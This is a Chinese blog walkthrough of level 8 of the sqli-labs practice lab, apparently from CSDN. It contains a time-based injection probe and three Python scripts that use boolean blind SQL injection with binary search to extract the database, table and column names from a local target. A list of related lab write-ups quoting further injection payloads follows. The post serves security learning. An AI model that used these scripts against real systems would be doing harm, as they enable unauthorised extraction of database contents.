sqlilabs第八关

最新推荐文章于 2025-03-12 23:59:20 发布
最新推荐文章于 2025-03-12 23:59:20 发布
阅读量331 收藏 4
点赞数 4
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_73729058/article/details/145618556
版权

?id=1' and sleep(2)--+

发现页面存在注点,使用时间盲注脚本进行注入---

import requests
 
 
def inject_database(url):
    name = ''   #name用于存储猜测出的数据库名称 
    for i in range(1, 20):  # 假设数据库名称长度不超过20
        low = 48  # '0'
        high = 122  # 'z'
        middle = (low + high) // 2   /*low, high, middle 用于二分查找(内层循环使用二分查找法猜测每个字符的ASCII值)*/
        while low < high:
            #构造Payload: payload是SQL注入的有效载荷,尝试猜测当前字符的ASCII值
            payload = "1' and ascii(substr(database(),%d,1))>%d-- " % (i, middle)
            params = {"id": payload}
            r = requests.get(url, params=params) 
            # 判断注入是否成功,依据靶场的返回信息
            if 'You are in' in r.text:  # 只检查包含 "You are in" 的内容,表示成功
                low = middle + 1
            else:
                high = middle
            middle = (low + high) // 2 
        # 只拼接有效字符,跳过空格(ASCII 32)和其他非打印字符
        if middle > 32:  # 跳过空格和不可打印字符
            name += chr(middle)
        print(f"Current database name: {name}")
        low = 48
        high = 122
        middle = (low + high) // 2
 
    print(f"Final database name: {name}")
 
 
if __name__ == "__main__":
    url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"
    inject_database(url)

用一个布尔盲注攻击,从数据库中提取表名

-循环遍历表名的每个字符

-二分查找法:通过ASCII码范围(48到122)进行二分查找,确定每个字符的值

-构造SQL注入Payload:利用substr函数和ascii函数逐字符比较表名的ASCII值

-发送请求并判断结果

-跳过空格和非打印字符:只拼接有效的字符

import requests
 
def inject_table_name(url, database_name):
    table_name = ''
    for i in range(1, 20):  
        low = 48  # '0'
        high = 122  # 'z'
        middle = (low + high) // 2
        while low < high:
            # payload
            payload = f"1' and ascii(substr((select table_name from information_schema.tables where table_schema='{database_name}' limit 0,1),{i},1))>{middle}-- "
            params = {"id": payload}
            r = requests.get(url, params=params)
 
            if 'You are in' in r.text:  
                low = middle + 1
            else:
                high = middle
            middle = (low + high) // 2
        if middle > 32:  # 跳过空格和不可打印字符
            table_name += chr(middle)

        print(table_name)
        low = 48
        high = 122
        middle = (low + high) // 2
 
    print(f"Final table name: {table_name}")
 
if __name__ == "__main__":
    url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"  
    database_name = "security"  # 目标数据库名称
    inject_table_name(url, database_name)

通过payload猜测数据库表的列名

import requests
 
def inject_column_name(url, database_name, table_name):
    column_name = ''
    for i in range(1, 20): 
        low = 48  # '0'
        high = 122  # 'z'
        middle = (low + high) // 2
        while low < high:
            payload = f"1' and ascii(substr((select column_name from information_schema.columns where table_schema='{database_name}' and table_name='{table_name}' limit 0,1),{i},1))>{middle}-- "
            params = {"id": payload}
            r = requests.get(url, params=params)
            if 'You are in' in r.text:  
                low = middle + 1
            else:
                high = middle
            middle = (low + high) // 2
 
        if middle > 32: 
            column_name += chr(middle)
 
        print(column_name)
 
        low = 48
        high = 122
        middle = (low + high) // 2
 
    print(f"Final column name: {column_name}")
 
if __name__ == "__main__":
    url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"  
    database_name = "security"  
    table_name = "users"  # 目标表名
    inject_column_name(url, database_name, table_name)

sqli-labs靶场8(布尔盲注)
qq_46527080的博客
12-12 2662
知识点 函数 ascii()函数 将某个字符串转化为ascii值(webRobot转换工具) ord()函数 将某个字符串转化为ascii值 length()函数 返回字段/结果/函数的长度,length(column_name) length(database()) 即返回当前数据库名长度 substr()函数 截取字符段长度 例如:substr(abcd,1,1) 从第一位开始(也就是从a开始)截取一个字符,就是a substr(abcd,2
sqli-labs第八(布尔盲注)
qq_42266432的博客
08-19 1632
第八看标题可知此可以使用布尔盲注,布尔盲注我的理解是页面不会回显错误,但是注入等式或不等式时通过页面的反应能判断出注入中算式的true或false 布尔盲注的步骤如下: 获取数据库长度 获取数据库名 获取数据库表 获取表中字段 获取表中数据 先拿获取数据库长度举例 可以看到在length(database())>7时页面正常,length(database())>8时页面异常,即8>7=true,8>8=false,所以数据库名长度为8 再比如获取表名: 同理,sub
sqli-labs靶场第八
gou1791241251的博客
12-26 1835
开始第八,传入id参数看看吧! 第一步:判断注入类型 传入单引号的时候页面显示异常了,说明闭合方式是含有单引号的! 通过使用and 1=1 和and 1=2的状态来判断是否是单引号闭合吧 显然此时是单引号闭合,有布尔类型状态。使用布尔盲注 第二步:判断有多少个字段,使用order by 一共有三个字段 以下便是通过布尔盲注来获取数据库信息的操作了,可以参考sqli-labs第六 ...
sql靶场--布尔盲注(第八)保姆级教程
最新发布
m0_75167824的博客
03-12 655
布尔盲注了,这种页面只会有成功和错误两个状态的页面,不会出现报错显示,这种可以尝试可以通过布尔盲注来不断尝试猜测出数据:并且我们可以使用多种方法来注入。然后一个一个注入出名字的字符的ASCLL码然后对照表将名字完整的获取出来。由于表名与字段名一般不可能只有一个,所以需要多注入出它们的具体数量。发现页面变换,但是没有报错了,只有这两种页面,基本就是布尔盲注了。一般名字命名的字符是在32-128之间,所以测试一般在里面测试。手动进行布尔盲注十分麻烦,首先先要注入出名字的长度。这里发现页面变换,但是没有报错。
sqli-labs:第八
J_linnb的博客
05-02 1026
使用二分法查找,小于110时不存在,小于120时存在,然后依次查找当猜到115时正常。由于得知数据库结果,根据前几可得知,第四个表是我们想要的,猜解第四个表长度。依次猜解第二个、三个...到第八个字母,最终为'security'猜测是闭了报错,根据正确和错误的回显不同,可以使用布尔盲注。根据之前二分法,得知表名为第一个值为117对应的为'u'猜解到8时正常显示,判断数据库名长度为8。猜解到5正常回显,因此第四个表长度为5。等于115时正常,第一个字母为's'以此类推,最后表名为'users'
sqli labs 第八
qq_67757718的博客
02-17 291
第八过程及语法命令
sqli-labs 靶场 less-8、9、10 第八到第十详解:布尔注入,时间注入
Superstacks超全栈
06-09 1273
S接下来的工作就是之前使用的布尔注入流程一样,通过一个个字的判断来确定是否为想要的字符。如此便可以采用和上面类似的盲注入代码来进行。执行结果,成功完成注入(有一说一,代码请求量一多这脚本运行时间真的长!但是你会发现,在获取用户密码的时候会有很多空字符,这里是什么原因呢?输入注入代码,通过测试可知是使用双引号来进行闭合的查询语句。在这里我们无法看到错误信息,也不知道信息能否正常获取到。我们先尝试用语句来判断是否获取正常。的方式来进行,当输入下列参数时可以看到页面需要。通过以上信息来看可以确定,这一可以用。
Sqli-labs靶场第8详解[Sqli-labs-less-8]
m0_73615178的博客
02-24 1377
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()sql注入——布尔型盲注(Boolean-based blind)
MSSQL SQLi Labs靶场 第一 (手工版)
mirliasheong的博客
12-05 1043
输入页面异常页面正常,说明存在注入。
sqli-labs第八-布尔注入
weixin_51706044的博客
03-30 5430
文章目录布尔注入一、第八数据库名判断长度爆破数据库名二、使用步骤总结 布尔注入 如果页面既没有显示位,也没有报错提示的话,可以使用布尔注入. 通过插入一些语句查看结果来判断是否存在布尔注入. 布尔注入的几个常用函数 函数使用: length(select database())>5 #length()里可以放查询语句,用来判断查询结果的长度 exists( ) #exists()里可以放查询语句,用来判断查询结果是否存在 ascii( ) #ascii()里可以放查询.
SQL-labs-Burp(第八)
weixin_51706044的博客
04-03 2353
文章目录前言一、数据库长度二、数据库名三、爆表名总结 前言 在上篇文章中我们进行sqli-labs第八时选择的是手注,可见过程是多么繁琐,因此在本文将会演示如何使用Burp作为辅助工具进行爆破 一、数据库长度 注入语句,进行爆破判断 ?id=1' and length(database())=8 --+ 抓包 进行爆破 处理数据 设置payload 进行攻击 判断出数据库的长度为:8 二、数据库名 代码块:?id=1' and ascii(substr(database(),1,1))=1
sqli-labs-master第八
FourthGuy的博客
10-09 1740
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
sqli-labs 第8
rp114514的博客
07-03 570
这次实训课,我们挑战了sqli-labs第8。在这一中,通过SQL注入技术获取数据库的相信息。这是一场激动人心的探索之旅,我尝试判断是否存在SQL注入,探测注入点,并最终猜解数据库名称。判断是否存在注入,探测注入点,域名后面加上吗,d 1=2,发现页面没有变化加上—qweId=1,网页有变化,说明存在sql注入添加order by,网页正常尝试order by4,发现网页有变化猜解库名长度,输入?id=1' and (length(database()))=8 – qwe,页面返回正常。
sqli-labs第8(布尔盲注)
weixin_45626840的博客
04-25 1509
概念: 布尔盲注:页面回显信息只有“真”与“假”两种状态,通过将猜测的值与ASCII码比较返回真假值进验证。 步骤: 1.求闭合字符 2.求当前数据库名的长度 3.求当前数据库名的ASCII值 4.求表的数量 5.求表名的长度 6.求表名对应的ASCII值 7.求列的数量 8.求列名的长度 9求列名对应的ASCII值 10.求字段数量 11.求字段长度 12.求字段对应ASCII值 思路: 1、判断注入点: 2、求库名长度------id=1’ and length(database())=8 --+
sql-labs靶场第七测试报告
ccc_9wy的博客
10-05 987
sql-labs靶场第七的测试报告;手工注入和sqlmap两种方法;靶场源代码分析;详细过程。
【SQLi-Labs刷题记录】第八思路 布尔盲注
gavinmao97的博客
12-16 1185
/* 作者刚刚接触sql注入,本文仅用作记录刷sqli-labs靶场时的思路,仅代表个人看法,如有不当之处,欢迎各位大佬及时批评指正! */ 根据卡名称可知,sqli-labs第八的考点是布尔盲注。 SQLi-Labs Less-8 第一步,根据卡名称提示可知,本题的注入点需要构造一个闭合的单引号对 构建url: …/Less-8/?id=8’ 页面无显示 构建url: …/Less-8/?id=8’ --+ 页面显示正常 根据页面回显可知,本的反馈结果只有“You are in”或者没有反馈,而
【sqli-labs 第八 较详细通解释】
m0_71635484的博客
02-17 1003
sqli-labs第八详解
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值